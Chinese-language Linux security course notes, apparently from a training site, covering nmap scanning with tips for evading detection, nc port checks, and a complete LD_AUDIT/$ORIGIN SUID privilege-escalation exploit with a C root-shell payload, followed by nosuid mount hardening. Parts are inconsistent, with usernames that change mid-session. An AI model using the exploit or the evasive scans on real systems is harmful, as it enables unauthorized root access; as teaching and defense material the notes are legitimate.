【端口扫描】加防提权操作
yum install nmap -y nmap 127.0.0.1 nmap -v www.baidu.com nmap -p 1-65535 www.baidu.com
扫描存活
nmap -sP -v 107.160.155.0/26
[root@xuegod63 ~]# lsof -i :22 #查看22端口正在被哪个进程使用
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 1089 root 3u IPv4 21779 0t0 TCP *:ssh (LISTEN)
通ps命令查找对应的进程文件:
[root@xuegod63 ~]# ps -axu | grep 1089
root 1089 0.0 0.1 105996 3744 ? Ss 10:52 0:00 /usr/sbin/sshd -D
注:看到进程的文件的路径是/usr/sbin/sshd 。如果没有看到此命令的具体执行路径,说明此木马进程可以在bash终端下直接执行,通过which和rpm -qf来查看命令的来源,如下:
[root@xuegod63 ~]# which vim
/usr/bin/vim
解决:
[root@xuegod64 init.d]# kill -9 1781
nmap -sS -O www.xuegod.cn
测试自己的电脑(物理机):
nmap -sS -O 192.168.1.63
例6: 查找一些有特点的IP地址中,开启80端口的服务器。
nmap -v -p 80 192.168.1.62-67
例7:如何更隐藏的去扫描,频繁扫描会被屏蔽或者锁定IP地址。
--randomize_hosts # 随机扫描
--scan-delay #延时扫描,单位秒
(1)、随机扫描
[root@xuegod63 ~]# nmap -v --randomize_hosts -p 80 192.168.1.62-69
Nmap scan report for 192.168.1.69 [host down]
(2)、随机扫描+延时扫描 ,默认单位秒
[root@xuegod63 ~]# nmap -v --randomize_hosts --scan-delay 3000 -p 80 192.168.1.62-69
例8:使用通配符指定IP地址
[root@xuegod63 ~]# nmap -v --randomize_hosts --scan-delay 30 -p 80 1.*.2.3-8
yum install nc -y
2、nc 语法:nc -v -w -z IP地址 端口号
-v 显示指令执行过程。
-w <超时秒数>?? 设置等待连线的时间。
-u 表示使用UDP协议
-z 使用0输入/输出模式,只在扫描通信端口时使用。
3、应用示例
例1:扫描指定的22端口
nc -v -w 10 -z 192.168.1.64 22 curl -I www.taobao.com
suid权限
24.2.1 开始提权 创建一个普通用户kill,并以kill用户登录 [root@xuegod63 ~]# useradd kill [root@xuegod63 ~]# echo 123456 | passwd --stdin kill Changing password for user kill. passwd: all authentication tokens updated successfully. [root@xuegod63 ~]# su kill [kill@xuegod63 ~]$ [kill@xuegod63 ~]$ cd /tmp/ [hello@localhost tmp]$ ls -ld /tmp/ drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/ [kill@localhost tmp]$ cd /tmp/ [kill@localhost tmp]$ mkdir exploit //随便在tmp目录下创建一个目录exploit:利用 [kill@localhost adore-ng]$ ll /bin/ping -rwsr-xr-x 1 root root 35832 Apr 24 2009 /bin/ping [kill@localhost tmp]$ ln /bin/ping /tmp/exploit/target //创建/bin/ping 的一个硬链接,硬链接的名随便起 [kill@localhost tmp]$ exec 3< /tmp/exploit/target [kill@localhost tmp]$ ls -l /proc/$$/fd/3 lr-x------ 1 kill kill 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target [kill@localhost tmp]$ rm -fr /tmp/exploit/ [kill@localhost tmp]$ ls -l /proc/$$/fd/3 //查看链接已经被删除 lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted) [kill@localhost tmp]$ cat payload.c //写一个C语言程序 void __attribute__((constructor)) init() //注:__这是两个_ 下划线 { setuid(0); system("/bin/bash"); } [kill@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c //编译C程序 [kill@localhost tmp]$ ls -l /tmp/exploit -rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit [kill@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 #开始提权 [root@localhost tmp]# whoami
24.2.2 防止黑客利用suid漏洞提权
1、对系统中所有 777权限的目录做如下操作
[root@xuegod63 ~]# mount -o bind,nosuid /tmp /tmp
2、把用户的家目录也取消一下suid权限
[root@xuegod63 ~]# mount -o bind,nosuid /home/kill /home/kill
3、再测试创建suid相关的文件时,提示以下错误。
[root@xuegod63 ~]# su - kill
[mk@xuegod63 ~]$ ln /bin/ping /tmp/ping
ln: creating hard link `/tmp/ping' => `/bin/ping': Invalid cross-device link
#报错,创建硬链接时,报错,无效的跨设备连接
4、查找系统中权限是777的目录
find命令参数说明:
-perm mode:文件权限正好符合mode
-perm +mode:文件权限部分符合mode
-perm -mode: 文件权限完全符合mode
root@xuegod63 ~]# find / -perm -777 -type d
/dev/mqueue
/dev/shm
/var/tmp
。。。
/tmp
5、给权限是777的目录都取消一下suid权限
[root@xuegod63 ~]# mount -o bind,nosuid /dev/mqueue /dev/mqueue
[root@xuegod63 ~]# mount -o bind,nosuid /dev/shm /dev/shm
[root@xuegod63 ~]# mount -o bind,nosuid /dev/tmp /dev/tmp
[root@xuegod63 ~]# echo 1 > /proc/sys/net/ipv4/ip_default_ttl #现在改成1
[root@xuegod63 ~]# ping baidu.com #发现ping不通百度了
tcpdump -i ens33 -vn -t icmp
[root@xuegod63 ~]# vim /etc/sysctl.conf #插入
net.ipv4.ip_default_ttl = 64
[root@xuegod63 ~]# sysctl -p #使配置文件/etc/sysctl.conf中的内容立即生效

浙公网安备 33010602011771号